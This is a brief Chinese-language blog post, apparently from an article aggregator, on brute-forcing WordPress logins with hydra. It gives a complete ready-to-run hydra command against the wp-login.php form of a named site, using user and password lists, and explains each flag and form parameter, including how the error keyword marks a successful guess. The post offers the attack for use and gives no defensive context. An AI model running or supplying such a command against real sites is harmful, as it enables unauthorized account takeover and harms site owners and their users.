hydra爆破wordpress密码
程序员文章站
2022-06-27 16:42:44
wpscan带这个功能 但是用户只能单个,不方便..
hydra -L user.txt -P /Users/hacked/Desktop/133232.txt -o /user...
wpscan带这个功能 但是用户只能单个,不方便..
hydra -L user.txt -P /Users/hacked/Desktop/133232.txt -o /users/hacked/123.txt -t 10 -f www.sysshell.com http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:login_error"
“/wp-login.php:log=^USER^&pwd=^PASS^:login_error”
说明:
-t 10 线程10条 默认是16
大写 L ,P 代表使用列表
小写 l ,p 代表指定.
/wp-login.php from提交表单的地址
log 用户字段 标示为 ^USER^表示这个是用户
pwd 密码字段
login_error 错误关键词, 登陆错误的关键词用于识别是否成功
上一篇: Intel新发烧U i9-10900X首次现身:10核心已成入门
下一篇: 这浓浓的画面感